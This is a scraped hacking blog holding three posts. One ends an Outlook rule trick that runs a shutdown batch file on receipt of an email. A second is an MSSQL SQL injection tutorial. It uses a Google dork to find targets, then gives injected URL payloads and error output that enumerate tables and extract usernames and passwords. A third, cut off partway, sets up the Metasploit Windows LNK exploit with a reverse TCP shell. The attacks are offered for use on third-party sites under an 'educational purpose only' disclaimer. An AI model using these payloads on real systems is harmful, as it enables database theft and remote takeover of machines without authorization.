----<br />
Now open up Microsoft Outlook. I am assuming that you have already configured it for your Email . Now we will need to make it so that Outlook checks your inbox about every minute.<br />
<br />
You can do this by going to Tools->Options. Then click on Mail Setup tab, and then, the Send/Receive button.<br />
<br />
----<br />
Make sure that the Schedule an automatic <b>send/receive</b> every… box is checked, and set the number of minutes to 1 or anytime you may like. Now you may close all of these dialog boxes.<br />
<br />
<span id="goog_1428696590"></span><span id="goog_1428696591"></span><a href="http://www.blogger.com/"></a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/b5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://hackspc.com/wp-content/uploads/2010/06/b5.jpg" width="343" /></a></div>
<br />
Now go to Tools-->Rules and Alerts. Click on <i>E-mail Rules</i> tab. In new window select <i>Check messages when they arrive</i> and click Next.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/d4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="http://hackspc.com/wp-content/uploads/2010/06/d4.jpg" width="400" /></a></div>
<br />
Now in next page, check on, <i>on this machine only </i>and <i>with specific words in the subject</i>.<br />
After checking these two values, click on <i>specific words</i> underlined.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/g2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://hackspc.com/wp-content/uploads/2010/06/g2.jpg" width="330" /></a></div>
<br />
Search Text window will open, in the input field type the command that
shuts down the PC. You can use any commands. For prevention of
accidental execution I kept <i>%shutdown% </i>as a command. Click on <i>Add</i> button after you are done and click on OK.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/h3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="http://hackspc.com/wp-content/uploads/2010/06/h3.jpg" width="400" /></a></div>
<br />
Now click on Next.<br />
In the next window check mark on<i> start application</i>. In the lower screen, click on application link.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/i3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://hackspc.com/wp-content/uploads/2010/06/i3.jpg" width="330" /></a></div>
<br />
Now you’ll be welcomed to your familiar file open window. Load all
files. And select the batch file that you’ve created to shutdown your
PC.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/k1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="134" src="http://hackspc.com/wp-content/uploads/2010/06/k1.jpg" width="400" /></a></div>
<br />
Click on Next, again click on next (don’t choose any things in this step). And finally click on Finish button.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/l1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://hackspc.com/wp-content/uploads/2010/06/l1.jpg" width="331" /></a></div>
<br />
You’ll have <i>%shutdown% </i>alert shown in the E-mail Rules tab.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/m.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="http://hackspc.com/wp-content/uploads/2010/06/m.jpg" width="320" /></a></div>
<br />
Now, when you send a message from your phone to your e-mail address with the Subject <b>%shutdown% </b>
your computer will trigger shutdown.bat file and instantly executes the
command in that batch file finally leading to shutdown the PC.<br />
<br />
<br />
:)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGVfAG5AHbOTgGfmoRBkumoYLQcis4hSDSc2XczYDKiiLV-TjyKQte4hyphenhyphenov5-y961X88x27bYVYJk9mwbibXudhAcZy6e8S1Pku37RfFuREAQGNSUvycRhaomY9noi4iBhsDthwzCpo24/s1600/dog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGVfAG5AHbOTgGfmoRBkumoYLQcis4hSDSc2XczYDKiiLV-TjyKQte4hyphenhyphenov5-y961X88x27bYVYJk9mwbibXudhAcZy6e8S1Pku37RfFuREAQGNSUvycRhaomY9noi4iBhsDthwzCpo24/s1600/dog.jpg" /></a></div>
<br />
<br /></div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-18102682740940563352011-11-03T00:56:00.000-07:002011-11-03T00:57:01.984-07:00MSSQL Injection<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 12pt; line-height: 115%;">MSSQL
Injection<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Ex: google dork <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">inurl:.asp?id=<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">find a result like :<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/some.asp?ID=12<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now to check if it is vuln or not<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">insert single quotation ' at the last :<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/some.asp?ID=12’<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">you get error like this:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">-------------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Error:Microsoft
OLE DB Provider for SQL Server error '80040e14'<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Unclosed
quotation mark before the character string ''.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">/some.asp,
line 86</span></b></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"> <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">-------------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Then you can proceed<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/some.asp?ID=12+and+1=convert(int,system_user)<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif;">(<b>* here you can observe that we are trying
to convert but it doesn’t happen which inturn shows the db name that it cant
convert into int).</b><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif;">So it
shows error , by showing the db name like:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif;">--------------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Error:
Microsoft OLE DB Provider for SQL Server error '80040e07'<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Syntax
error converting the nvarchar value 'usr' to a column of data type int.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">/some.asp,
line 86<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">---------------------------------------------------------------<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">In the error it shows some db name as <b>“usr” .</b><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">We try to bring all the available tables in a
database :<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/some.asp?ID=12+and+1=convert(int,select+top+1+table_name+from+information_schema.tables))<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">(here
information_schema is the database , this you can find in myphp).</span></b></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">We get error like :<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">----------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Microsoft
OLE DB Provider for SQL Server error '80040e07'<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Error:
Syntax error converting the nvarchar value 'galery' to a column of data type
int.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">/some.asp,
line 86<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">-----------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">(<b>here
table name is galery)<o:p></o:p></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">But no login credentials will be in the galery
table ,To find the Second table name<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/some.asp?ID=12+and+1=convert(int,select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('galery')))<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">we get table name as <b>users</b><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">now to find columns in <b>users</b> table: <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/site.asp?ID=12+and+1=convert(int,select+top+1+column_name+from+information_schema.columns+where+table_name='users'))<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">we get this<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">-----------------------------------------------<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Microsoft
OLE DB Provider for SQL Server error '80040e07'<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Error: Syntax
error converting the nvarchar value 'username' to a column of data type int.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">/some.asp,
line 86</span></b></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"> <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">-----------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">To find second column folow the above step like
finding the second table name<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now we need to find the values in the table with
columns username and password<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/some.asp?ID=12
and+1=convert(int,(select+top+1+username+from+users))<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"> same as
like for finding value in password field too.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Got it.?<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 13pt; line-height: 115%;">[ * <b>Warning
: Im not responsible for your actions , this is for educational purpose only .
]<o:p></o:p></b></span></span></div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-83937160917659409862011-10-25T01:49:00.000-07:002011-10-25T01:49:30.902-07:00Windows lnk Exploit<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background: white; color: black; font-family: "Arial","sans-serif";">Hack the system using the windows lnk exploit:</span></u></b></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif";"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Update metasploit.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Goto the prompt and goto framework<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Then type:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">#./msfconsole<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Msf>prompt opens..<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">The search for the exploit windows lnk.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Msf>search
lnk<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Then it shows the exploit<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">exploit/xxxxx/xxxxxr/xxxxx_dllloader<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">then type:</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><o:p></o:p></span></span><span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">msf>use
exploitname</span></b></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">(type above exploit)<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">set <b>SRVHOST
</b><span> </span>tat is your local ip to get
conection back</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Then set payload<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Shell/reverse_tcp payload works mostly<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
